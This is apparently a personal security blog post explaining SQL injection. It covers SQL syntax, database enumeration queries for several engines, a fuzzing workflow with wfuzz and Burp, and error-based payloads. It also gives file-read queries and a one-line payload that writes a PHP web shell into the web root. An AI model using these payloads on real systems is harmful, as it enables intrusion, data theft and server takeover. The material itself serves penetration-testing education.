Application Security

Behind the Hack: The Mechanics of SQL Injection Attacks

Hello hackers, Welcome back to my new blog, I hope you all are well!! In this blog, we are going to discuss SQL Injection Attacks…

fuffsec

13 Sep 2023 • 4 min read

Hello Smart hackers, Welcome back to my new blog, I hope you all are well!!
In this blog, we are going to discuss SQL Injection Attacks.
Please, read this article until the end.

SQL injection arises when user input isn’t properly sanitized before being incorporated into database queries. This allows us to insert our harmful commands.

By exploiting SQL injection flaws, hackers can extract confidential data, alter data, or save files to the host server, potentially gaining full control over it.

Let’s learn some syntax of SQL

-- SELECT statement to retrieve data from a table 
SELECT column1, column2, ... 
FROM tablename 
WHERE condition; 
 
-- INSERT statement to add data to a table 
INSERT INTO tablename (column1, column2, ...) 
VALUES (value1, value2, ...); 
 
-- UPDATE statement to modify existing data in a table 
UPDATE tablename 
SET column1 = value1, column2 = value2, ... 
WHERE condition; 
 
-- DELETE statement to remove data from a table 
DELETE FROM tablename 
WHERE condition; 
 
-- CREATE TABLE statement to create a new table 
CREATE TABLE tablename ( 
    column1 datatype, 
    column2 datatype, 
    ... 
); 
 
-- DROP TABLE statement to delete a table 
DROP TABLE tablename; 
 
-- ALTER TABLE statement to modify a table (e.g., add a column) 
ALTER TABLE tablename 
ADD columnname datatype; 
 
-- Basic JOIN operation to retrieve data from multiple tables 
SELECT column1, column2, ... 
FROM table1 
JOIN table2 
ON table1.column = table2.column 
WHERE condition;

Database Enumeration

Enumerating MySQL Databases

select version(); 
select current_user(); 
select table_schema from information_schema.tables group by table_schema; 
select table_name from information_schema.tables where table_schema = 'app'; 
select column_name, data_type from information_schema.columns where table_schema = 'app' and table_name = 'menu';

Microsoft SQL Server-Specific Functions and Tables

select @@version; 
SELECT SYSTEM_USER; 
SELECT name FROM sys.databases; 
select * from app.information_schema.tables; 
select COLUMN_NAME, DATA_TYPE from app.information_schema.columns where TABLE_NAME = 'menu'; 
 
GO

PostgreSQL Specific Functions and Tables

select version(); 
select current_user; 
select datname from pg_database; 
select table_name from app.information_schema.tables where table_schema = 'public'; 
select column_name, data_type from app.information_schema.columns where table_name = 'menu';

How to find SQL Injection and Build Payload

Process:

Go through the website manually while proxying the request with a burp.
Find all the input points to the target which gets processed.
Inject with payload to burp intruder and fuzz.
If it errors out, then read the error and build a payload on it.
If no error, there is no injection or it could be a blind SQL injection where the error is not shown.
For blind SQL injection, use blind injection payload to test it.
Once you craft a payload, then exploit it to dump the DB or code execution.

Tools to use:

wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -d "id=FUZZ" -u http://<>

Once you confirm it, Exploit it

Try to build a payload using one of the below ways: [1]

Error-based — “Error-based injections are exploited by triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results or gain information on how to restructure the query for further exploitation”. (link)

cast(@@version as integer) 
extractvalue('',concat('>',version())) 
to_char(dbms_xmlgen.getxml('select "'|| (select substr(banner,0,30) from v$version where rownum=1)||'" from sys.dual'))

2. Union-based — Union-based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns). You can try to enumerate the amount of columns using error-based enumeration. (link)

3. Blind-based — “Blind SQL injection is one of the more advanced methods of injection. The Partial-Blind and Full-Blind methods are detailed below. Use care when performing these queries, as they can overload a server if performed through heavy automation.” (link)

4. Stacked Query based — “Stacked queries provide a lot of control to the attacker. By terminating the original query and adding a new one, it will be possible to modify data and call stored procedures. This technique is massively used in SQL injection attacks and understanding its principle is essential to a sound understanding of this security issue.” [2]

5. Misc

5.1 Read and Write [1]

SELECT * FROM mytable INTO dumpfile '/tmp/somefile' [MySql] 
SELECT pg_read_file('/usr/local/pgsql/data/pg_hba.conf', 0, 200); [Postgre]

5.2 Execute commands [1]

SELECT "<? echo passthru($_GET['cmd']); ?>" INTO OUTFILE '/var/www/shell.php'

Automated Tool

We could execute sqlmap to do the attack. It is more useful to manually explore a target before using an automated tool. This prevents us from breaking it or missing out on critical hidden injection points.

Short cheat sheet:

References:

I have such a small request for all of you, I always write articles on many security topics. So if you didn’t follow, then follow me first and clap on this article, because that gives me the motivation to write something new !!

If you didn’t follow me on my social, here is my Twitter and LinkedIn.

☛ My-Twitter
☛ My-Linkedin

Thank you !!!